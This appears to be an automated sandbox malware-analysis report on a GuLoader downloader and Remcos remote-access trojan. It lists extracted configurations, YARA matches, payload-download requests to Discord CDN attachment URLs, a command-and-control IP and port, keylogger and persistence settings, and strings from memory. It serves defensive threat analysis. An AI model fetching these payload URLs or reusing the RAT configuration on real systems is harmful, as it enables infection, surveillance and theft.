Source: 00000019.00000002.398154379475.0000000008FC0000.00000040.00000800.00020000.00000000.sdmp |
Malware Configuration Extractor: GuLoader {"Payload URL": "https://cdn.discordapp.com/attachments/933089228261294143/9"} |
Source: 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp |
Malware Configuration Extractor: Remcos {"Host:Port:Password": "i;j49.123:2404:194.130.249.123:4687:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-WPACZI", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"} |
Source: Yara match |
File source: 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000021.00000002.398543699572.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000011.00000003.399012710463.0000000002E47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000011.00000002.401404635796.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000011.00000003.399011957621.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000011.00000002.401406941267.0000000002E46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000002.398100700330.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: ieinstal.exe PID: 2008, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: ieinstal.exe PID: 4696, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: ieinstal.exe PID: 6628, type: MEMORYSTR |
Source: global traffic |
HTTP traffic detected: GET /attachments/933089228261294143/933089306719961188/IMG_25254535627256.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache |
Source: unknown |
Network traffic detected: HTTP traffic on port 49817 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49818 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49827 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49829 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49818 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49829 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49817 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49827 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: ieinstal.exe, 00000011.00000003.397078792955.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000002.401404635796.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000003.399011957621.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: ieinstal.exe, 00000011.00000003.397078792955.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000002.401404635796.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000003.399011957621.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000004.00000002.397140404405.0000000005AED000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000004.00000002.397127576190.0000000004C98000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000004.00000002.397127576190.0000000004C98000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png$ |
Source: powershell.exe, 00000004.00000002.397124852706.0000000004A81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.398643865938.0000000004B61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.398107972991.00000000052A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.398548806437.0000000004B81000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000004.00000002.397127576190.0000000004C98000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000004.00000002.397127576190.0000000004C98000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html$ |
Source: powershell.exe, 00000004.00000002.397124852706.0000000004A81000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB6m |
Source: powershell.exe, 00000015.00000002.398643865938.0000000004B61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.398107972991.00000000052A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.398548806437.0000000004B81000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lBAm |
Source: ieinstal.exe, 00000011.00000002.401403794938.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/ |
Source: ieinstal.exe, 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/1s |
Source: ieinstal.exe, 00000021.00000002.398544109967.0000000004EE0000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398542601563.000000000362B000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bin |
Source: ieinstal.exe, 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bin& |
Source: ieinstal.exe, 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.binb |
Source: ieinstal.exe, 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bing |
Source: ieinstal.exe, 00000021.00000002.398541662516.00000000035E8000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.binn32 |
Source: ieinstal.exe, 00000021.00000002.398541662516.00000000035E8000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.binnmd |
Source: ieinstal.exe, 00000021.00000002.398542601563.000000000362B000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bino |
Source: ieinstal.exe, 00000011.00000002.401434029761.000000001EA64000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bins |
Source: ieinstal.exe, 00000011.00000002.401404635796.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000003.399011957621.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bint |
Source: ieinstal.exe, 00000011.00000002.401407177634.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000003.399011752798.0000000002DA1000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000002.401404217250.0000000002DA1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/attachments/933089228261294143/933089306719961188/IMG_25254535627256.jpg |
Source: ieinstal.exe, 00000011.00000002.401407177634.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/attachments/933089228261294143/933089306719961188/IMG_25254535627256.jpgS |
Source: ieinstal.exe, 00000011.00000002.401403794938.0000000002D88000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/c |
Source: ieinstal.exe, 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/k-? |
Source: ieinstal.exe, 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/p |
Source: powershell.exe, 00000004.00000002.397140404405.0000000005AED000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000004.00000002.397140404405.0000000005AED000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000004.00000002.397140404405.0000000005AED000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000004.00000002.397127576190.0000000004C98000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000004.00000002.397127576190.0000000004C98000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester$ |
Source: powershell.exe, 00000004.00000002.397140404405.0000000005AED000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: global traffic |
HTTP traffic detected: GET /attachments/933089228261294143/933089306719961188/IMG_25254535627256.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache |
Source: Yara match |
File source: 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000021.00000002.398543699572.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000011.00000003.399012710463.0000000002E47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000011.00000002.401404635796.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000011.00000003.399011957621.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000011.00000002.401406941267.0000000002E46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000002.398100700330.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: ieinstal.exe PID: 2008, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: ieinstal.exe PID: 4696, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: ieinstal.exe PID: 6628, type: MEMORYSTR |